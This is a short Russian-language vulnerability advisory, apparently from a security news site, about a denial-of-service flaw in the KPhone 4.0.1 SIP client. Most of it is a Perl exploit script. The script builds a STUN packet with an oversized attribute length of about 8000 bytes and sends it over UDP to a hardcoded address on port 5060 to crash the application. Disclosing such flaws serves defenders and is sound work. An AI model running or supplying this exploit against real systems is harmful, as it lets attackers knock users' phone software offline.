Программа: KPhone 4.0.1 

Уязвимость обнаружена в KPhone. Удаленный пользователь может аварийно завершить работу приложения.
Удаленный пользователь может послать специально обработанный STUN пакет (с параметром attrLen более 8000 байт), чтобы аварийно завершить работу приложения целевого пользователя. 

Эксплоит: 

#!/usr/bin/perl
use IO::Socket::INET;

my $buf = join(«», «\x01\x01», # BindingResponse
«\x00\x01», # MsgLength
«A»x16, # GUID
«\x00\x00», # Attribute
«\x08\x01», # AttrLength
«A»x7975 # Value
);

my $remote = IO::Socket::INET->new( Proto => ‘udp’,
PeerAddr => ‘192.168.1.49’,
PeerPort => 5060);

print $remote $buf;



Оставить мнение